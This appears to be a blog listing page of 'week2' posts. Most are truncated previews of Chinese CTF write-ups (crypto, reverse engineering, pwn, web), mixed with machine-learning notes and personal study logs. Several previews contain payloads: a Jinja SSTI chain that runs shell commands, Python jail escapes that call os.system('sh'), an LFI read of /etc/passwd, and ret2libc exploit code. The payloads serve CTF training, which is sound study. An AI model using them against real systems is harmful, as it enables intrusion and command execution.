• 2024-10-220xGame week2 Re 补
    0xGameweek2Re补Xor::Ramdom先看代码逻辑:int__fastcallmain(intargc,constchar**argv,constchar**envp){__int64v3;//raxcharv4;//blboolv5;//siboolv6;//bl_BYTE*v7;//rdxcharv8;//alintv9;//ebx__int64v10;//
  • 2024-10-200xGame2024-week2-crypto
    CryptoLFSR-babyfromrandomimportgetrandbitsfromsecretimportflag,seedfromhashlibimportmd5defMD5(m):returnmd5(str(m).encode()).hexdigest()classLFSR: def__init__(self,seed,Length): self.Length=Length assertseed.bit_length()<
  • 2024-10-15NewStar2024-week2-Crypto
    Crypto茶里茶气fromCrypto.Util.numberimport*flag="flag{*****}"assertlen(flag)==25a=""foriinflag:a+=hex(ord(i))[2:]l=int(a,16).bit_length()print("l=",l)v0=int(a,16)>>(l//2)v1=int(
  • 2024-09-15复健week2
    复健week2虽然这周就开始上课了,但是下周才开始上强度,本来准备这周多写点题的,结果发现时间还是玩过去或者睡过去了,呜呜呜。一道屑题LG11031『DABOIRound1』CompletelyUnrelated本来是上周月赛的题,这周一想补一下,结果太\(\div\)了交了\(12\)发还是过不去,一开始以为是方
  • 2024-09-07[HNCTF 2022 WEEK2]easy_include
    开启NSSCTF靶场,打开链接:可以看到过滤了很多常见的利用协议,GET传参是file先随便读取点正常的文件吧,构造payload:/?file=/etc/passwd可以看到是nginx服务器还有日志文件信息apache服务器日志存放文件位置:/var/log/apache/access.lognginx服务器日志存放位置:/var/log/
  • 2024-07-13[HNCTF 2022 WEEK2]ez_SSTI
    [HNCTF2022WEEK2]ez_SSTIpayload:?name={{''.__class__.__base__.__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("catflag").read()')}}1.首先输入{{8*8}}判
  • 2024-06-23吴恩达机器学习 第三课 week2 推荐算法(上)
    目录01学习目标02推荐算法2.1定义    2.2应用2.3算法03 协同过滤推荐算法04电影推荐系统4.1问题描述4.2算法实现05总结01学习目标   (1)了解推荐算法   (2)掌握协同过滤推荐算法(CollaborativeFilteringRecommenderAlgorithm)原理  
  • 2024-03-31week2—南苑速递
     一、典型用户的模板1.名字:张晓明2.年龄和收入:张晓明是一位28岁的年轻职场人,拥有稳定的月收入,处于事业上升期。3.代表的用户在市场上的比例和重要性:张晓明所代表的年轻职场人群在快递代拿服务市场中占据了相当大的比例,且他们作为互联网原住民,对便捷、高效的线上服务有较高需
  • 2024-03-14【WEEK2】 【DAY5】数据处理及跳转之数据处理【中文版】
    2024.3.8Friday接上文【WEEK2】【DAY4】数据处理及跳转之结果跳转方式【中文版】目录5.2.数据处理5.2.1.提交处理数据5.2.1.1.提交的域名称和处理方法的参数名一致5.2.1.2.提交的域名称和处理方法的参数名不一致5.2.1.3.实例:新建文件1.UserController.java2.运
  • 2024-03-06NewStar Week2-3部分pwn wp
    stack_migrationchecksec开启了NX保护,但是没有PIE和Canary代码审计可以看到有两个read和一个printf。第一个read没什么用我们看第二个。因为v2距离rbp有0x50个字节,而read只能读入0x60个字节,意味着我们剩余的字节数只有0x10,没法构造完整的ROP链,那么我们就只能利用栈迁移来变
  • 2024-03-05HNCTF 2022 WEEK2
    [HNCTF2022WEEK2]e@sy_flower发现花指令changetype90nop掉在主函数p重构,然后就可以反编译了编写脚本enc="c~scvdzKCEoDEZ[^roDICUMC"flag=[1]*24forjinrange(24):flag[j]=chr(ord(enc[j])^48)foriinrange(12):v5=flag[2*i+1]
  • 2024-01-02week2计划
    任务修改开题报告(目标:完成修改,并在教务系统上确认)课题背景什么是信创?从密码国产化和28类密码来讲研究目的和意义之前的软件管理都是从硬件来实现的,现在使用软件来实现,参考0018标准研究现状密码法国密的发展历程技术方案参考《密码软件实现与密钥安全》有一个密钥安全方
  • 2023-12-20【misc】[HNCTF 2022 WEEK2]calc_jail_beginner_level4.1(JAIL) --沙盒逃逸,python模板注入变换
    这道题没给附件,直接连上看看这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())进行尝试,后面发现bytes函数被禁用了,可以用另外的函数代替().__class__.__base__.__subclasse
  • 2023-12-20【misc】[HNCTF 2022 WEEK2]calc_jail_beginner_level4(JAIL) --沙盒逃逸,python模板注入
    查看附件信息这里禁用了__import__,直接导致了help()函数和breakpoint()函数没法使用,并且还过滤了关键字符,这里考虑python模板注入,但是这里还过滤chr(),这里可以使用bytes函数payload如下:().__class__.__base__.__subclasses__()[-4].__init__.__globals__['system']('sh')
  • 2023-12-13week2-神经网络基础
    1.BinaryClassification如上图所示是经典的二分类问题。输入的图片是3通道64*64像素的,有3个64*64的矩阵,把这些像素亮度放入一个特征向量(featurevector)x。(按照通道的顺序排列下来,如上图的X),向量x的总维度就是64*64*3,为12288。用n_x=12288来表示输入的特征向量x(列向量)的维度,为
  • 2023-10-21 0xGame 2023【WEEK2】Crypto全解
    中间的那个人题目信息fromsecretimportflagfromCrypto.Util.numberimport*fromCrypto.CipherimportAESfromhashlibimportsha256fromrandomimport*p=getPrime(128)g=2A=getrandbits(32)B=getrandbits(32)Alice=pow(g,A,p)Bob=pow(g,B,p)
  • 2023-10-17 Newstar CTF 2023 week2 pwn
    1.ret2libc发现存在poprdi观察main函数,可以利用puts函数泄露libcfrompwnimport*fromLibcSearcherimport*context(os="linux",arch="amd64",log_level="debug")elf=ELF('/home/miyu/Desktop/ret2libc')p=remote("node4.b
  • 2023-10-16newstar week2
    REPZthon发现是python写的,先用pyinstxtractor解包,然后将PZthon.pyc用pycdc反编译得到源码#SourceGeneratedwithDecompyle++#File:PZthon.pyc(Python3.9)defhello():art='\n___
  • 2023-09-24[HNCTF 2022 WEEK2]e@sy_flower
    花指令分析如果没接触过花指令,先看这个博客,大致了解一下花指令https://www.cnblogs.com/Here-is-SG/p/15802040.html点击此处下载附件查壳32位,无壳去除花指令用32位ida打开,就看到红色字体的XREF(非自然程序流程,可以用它对程序流进行跟踪和控制,估计以后有的学了),这时候F5反
  • 2023-08-27左耳听风 ARTS Week2
    Algorithm每周至少做一个Leetcode的算法题。assign-cookiesfuncfindContentChildren(g[]int,s[]int)(ansint){//排序sort.Ints(g)sort.Ints(s)//孩子数量//饼干数量m,n:=len(g),len(s)fori,j:=0,0;i<m&&j<n;i++{
  • 2023-07-11week2
    第2周目录第2周四、多变量线性回归(LinearRegressionwithMultipleVariables)4.1多维特征4.2多变量梯度下降4.3梯度下降法实践1-特征缩放4.4梯度下降法实践2-学习率4.5特征和多项式回归4.6正规方程4.7正规方程及不可逆性(可选)四、多变量线性回归(LinearRegressionwit
  • 2023-07-02week2 day1
    今天:早上八点起来学车,进行科目三的学习从九点一直到下午四点,都在驾校耐受高温 下午回家洗了个澡,理了个发。理的有点短,还能说过去;因为头发短,染发计划推迟晚上打了个车回老家,如果不出去吃饭就在家学习一下Java敲一下ptaor出去吃饭,回来打游戏睡觉。明天将揭晓今晚干了什
  • 2023-05-14[HNCTF 2022 WEEK2]e@sy_flower
    查壳:32位,进IDA:发现进不了思维图那,且看到了爆红点:什么办法,没办法,nop掉呗,这里注意,不是全部nop掉,(这里只用nop掉一个):这里+1,那么我门只nop第一个就好:选中jmp那段内容,ctrl+alt+k:点patch,就行,然后它会问你要不要修改下一个,直接关掉就好:会发现正常了,但是点击F5依旧进不去
  • 2023-05-07CS61B_discussion3_week2_2
    1publicclassHorse{2Horsesame;3Stringjimmy;45publicHorse(Stringlee){6jimmy=lee;7}89publicHorsesame(Horsehorse){10if(same!=null){11Horsesame=horse;12
  • 2023-05-05[HNCTF 2022 WEEK2]
    easy_unser<?phpinclude'f14g.php';error_reporting(0);highlight_file(__FILE__);classbody{private$want,$todonothing="ican'tgetyouwant,ButyoucantellmebeforeIwakeupandchangemymind"